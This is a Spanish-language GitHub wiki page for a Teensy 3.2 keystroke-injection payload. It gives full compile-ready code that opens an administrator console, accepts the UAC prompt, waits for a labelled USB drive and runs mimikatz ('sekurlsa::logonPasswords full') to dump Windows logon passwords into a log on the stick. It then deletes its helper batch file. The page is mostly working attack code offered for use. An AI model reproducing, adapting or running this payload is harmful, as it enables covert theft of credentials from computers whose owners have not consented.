Payload Mimikatz USB - H3LL0WORLD/Teensy-Plantilla-Base GitHub Wiki

¿Qué hace?

1. Ejecuta una consola de comandos como administrador
2. Espera a que la USB sea insertada
3. Ejecuta mimikatz basándose en la arquitectura del sistema.
4. Guarda el log con la información en la USB.

##Créditos

• Plantilla Base: H3LL0WORLD
• Basado en la versión para la USB Rubber Ducky
• Mejoras y versión para la Teensy 3.2 por H3LLOW0RLD

##Requisitos

• USB con la versión de mimikatz para 32 y 64 bits, descargar aquí.
• Los ejecutables deben llamarse "mimikatz64.exe" y "mimikatz32.exe" y deben estar en la carpeta raíz de la USB.

##Uso

1. Poner el código en la función payload al final de la plantilla base.
2. Editar el valor de la variable 'USB_LABEL' con el nombre de la USB.
3. Compilar y ejecutar

// Etiqueta USB
#define USB_LABEL "HELLOWORLD"
/*
 * La USB debe tener en la carpeta raíz la versión de mimikatz para 32 y 64 bits
 * Sus nombres deben ser "mimikatz64.exe" y "mimikatz32.exe"
*/

// Delay en milisegundos
int ds = 500;

// Minimizar ventanas
GUI(M);
delay(ds);

// Buscar cmd en el menú inicio
GUI();
delay(ds/2);
escribir("cmd");
delay(ds);

// CMD AS ADMIN
CTRL_SHIFT(ENTER);
delay(ds*3);

// Aceptar el cuadro de dialogo
Izq();
Enter();
delay(ds*2);

// Ir a la carpeta de archivos temporales
Escribir("cd %TMP%");

// Si existe el bat eliminarlo
Escribir("del /Q Esperar.bat");

// Comenzar a escribir el bat
Escribir("copy con Esperar.bat");

// Detectar arquitectura del sistema
Escribir("For /F \"tokens=1\" %%a in ('wmic OS get OSArchitecture ^| find \"bits\"') do (set OS=%%a)");
Escribir(":WHILE");
// Detectar letra de USB basándose en la etiqueta o nombre
Escribir("for /f \"tokens=3 delims= \" %%A in ('ECHO list volume ^| diskpart ^| findstr \""USB_LABEL"\"') do (set USBDrive=%%A:)");
// Si no se ha detectado la USB esperar 3 segundos antes de volver a revisar
Escribir("if [%USBDrive%] EQU [] (");
Escribir("TIMEOUT /T 3");
// Si se detecta la USB y si existe la versión de mimikatz adecuada iniciar mimikatz
Escribir("GOTO :WHILE ) else if exist %USBDrive%\\mimikatz%OS%.exe (");
Escribir("GOTO :BREAK) ELSE (");
Escribir("TIMEOUT /t 3");
Escribir("SET USBDrive=");
Escribir("GOTO :WHILE)");
Escribir(":BREAK");    
// Iniciar mimikatz y re direccionar la salida a un log en la USB
Escribir("%USBDrive%\\mimikatz%OS%.exe > %USBDrive%\\logContraseñas.txt");
// Terminar de escribir el Bat
CTRL(C);
delay(ds);
// Ejecutar el bat
Escribir ("Esperar.bat");
delay(ds*4);

// Hacer dump y extraer contraseñas de inicio de sesión con mimikatz
Escribir("privilege::debug");
delay(ds);
Escribir("sekurlsa::logonPasswords full");
delay(ds);
Escribir("exit");
delay(ds);
// Eliminar bat
Escribir("del /Q Esperar.bat");
Escribir("exit");

// Restaurar ventanas minimizadas
delay(ds);
GUI_SHIFT(M);